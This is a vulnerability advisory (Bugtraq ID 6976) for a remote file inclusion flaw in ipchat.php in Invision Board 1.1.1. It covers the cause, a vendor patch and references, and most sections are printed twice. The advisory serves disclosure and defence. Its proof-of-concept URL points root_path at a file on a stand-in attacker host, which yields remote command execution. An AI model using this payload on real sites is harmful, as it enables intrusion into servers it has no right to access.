Invision Board ipchat.php Remote File Include Vulnerability
BID:6976
Info
Invision Board ipchat.php Remote File Include Vulnerability
| Bugtraq ID: | 6976 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 27 2003 12:00AM |
| Updated: | Feb 27 2003 12:00AM |
| Credit: | Discovery of this vulnerability has been credited to "Frog Man" <[email protected]>. |
| Vulnerable: |
Invision Power Services Invision Board 1.1.1 |
| Not Vulnerable: | |
Discussion
Invision Board ipchat.php Remote File Include Vulnerability
Invision Board is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.
This vulnerability is as a result of insufficient sanitization performed on remote user supplied data used in URI parameters of certain PHP pages.
Under some circumstances, it may be possible for remote attackers to influence the include path for a global configuration file to point to an external file on a remote server.
If the remote file is a malicious file, this vulnerability may be exploited to execute arbitrary system commands in the context of the web server.
Invision Board is prone to an issue that may allow remote attackers to include files located on attacker-controlled servers.
This vulnerability is as a result of insufficient sanitization performed on remote user supplied data used in URI parameters of certain PHP pages.
Under some circumstances, it may be possible for remote attackers to influence the include path for a global configuration file to point to an external file on a remote server.
If the remote file is a malicious file, this vulnerability may be exploited to execute arbitrary system commands in the context of the web server.
Exploit / POC
Invision Board ipchat.php Remote File Include Vulnerability
The following proof of concept was provided:
http://www.example.com/ipchat.php?root_path=http://www.attacker.com/conf_global.php
The following proof of concept was provided:
http://www.example.com/ipchat.php?root_path=http://www.attacker.com/conf_global.php
Solution / Fix
Invision Board ipchat.php Remote File Include Vulnerability
Solution:
The vendor has confirmed the issue and released a patched version of the 'ipchat.php' file.
Invision Power Services Invision Board 1.1.1
Solution:
The vendor has confirmed the issue and released a patched version of the 'ipchat.php' file.
Invision Power Services Invision Board 1.1.1
-
Invision Power Services ipchat.zip
http://forums.invisionpower.com/index.php?s=275229aa66a9f76b7b2013b090 d63135&act=Attach&type=post&id=407670
References
Invision Board ipchat.php Remote File Include Vulnerability
References:
References:
- Invision Board Homepage (Invision Power Services)
- Invision Power Board (PHP) ("Frog Man"
)